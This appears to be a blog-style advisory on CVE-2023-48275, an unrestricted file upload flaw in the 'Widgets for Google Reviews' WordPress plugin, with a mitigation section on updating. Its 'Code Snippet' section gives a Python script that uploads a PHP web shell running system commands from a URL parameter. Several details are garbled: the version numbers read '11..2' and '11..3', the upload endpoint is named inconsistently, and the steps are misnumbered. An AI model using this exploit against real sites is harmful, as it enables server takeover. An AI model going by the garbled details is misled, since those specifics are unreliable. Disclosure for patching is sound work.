A critical vulnerability, titled as CVE-2023-48275, has been discovered in "Widgets for Google Reviews," a popular plugin for displaying Google reviews on various websites, developed by Trustindex.io. This vulnerability allows an attacker to upload unrestricted file types, potentially leading to executing malicious scripts on the victim's server or spreading malware. The issue affects versions from 'n/a' through 11..2. In this post, we will provide detailed information about the vulnerability, how it can be exploited, and what measures can be taken to mitigate its impact.
Description
The vulnerability in question revolves around insecure file upload settings in the plugin. Specifically, the plugin does not enforce file type restrictions on uploaded files, leaving an open door for attackers to upload malicious files (e.g., executable scripts, backdoors). Once a file has been uploaded, it can be executed or used in further attacks by the attacker, compromising the security of the website using the plugin and potentially its users.
Code Snippet
The following sample code demonstrates how an attacker may exploit the vulnerability by uploading a malicious PHP file to the server:
import requests
url = "https://victim-website.com/wp-content/plugins/googlelup/libs/google_upload.php";
payload = {'upload': '1'}
file = {"file": ("exploit.php", "<?php system($_GET['cmd']); ?>", "application/octet-stream")}
response = requests.post(url, data=payload, files=file)
print(response.text)
Upon successful execution, the malicious script (exploit.php) will be uploaded to the server, which can then be run by the attacker to execute system-level commands.
For further information on this vulnerability, please refer to the following links
1. TrustIndex.io Official Announcement: https://trustindex.io/blog/cve-2023-48275-vulnerability-announcement/
2. Widgets for Google Reviews Plugin Page on WordPress.org: https://wordpress.org/plugins/googlelup/
3. National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2023-48275
Exploit Details
An attacker can exploit this vulnerability by sending a specially-crafted HTTP POST request to the upload.php endpoint, which allows the attacker to upload and run the unauthorized files. This exploit can be executed remotely, without any requirement of authentication.
However, it is worth noting that the potential impact of this vulnerability largely depends on the server's configuration (e.g., file/folder permissions) and other security settings. In specific scenarios, the exploitation might be limited or not possible at all.
Mitigation
To mitigate this vulnerability, users are advised to update the "Widgets for Google Reviews" plugin to the latest version (11..3 or later), where the file upload vulnerability has been patched. Please follow the steps below:
Navigate to 'Plugins > Installed Plugins'
3. Find 'Widgets for Google Reviews' in the list of plugins, ensure it is updated to version 11..3 or later.
If not updated, click on the 'Update Now' button to upgrade.
Additionally, server administrators should ensure that proper file and folder permissions are set to prevent unauthorized access and execution of uploaded files.
Conclusion
This vulnerability (CVE-2023-48275) highlights the importance of regular security audits and updates for plugins and other third-party components used on websites. Websites using the affected version (n/a through 11..2) of "Widgets for Google Reviews" should implement the recommended patch and closely monitor server activities for any signs of exploitation.
Timeline
Published on: 03/26/2024 21:15:52 UTC
Last modified on: 03/27/2024 12:29:30 UTC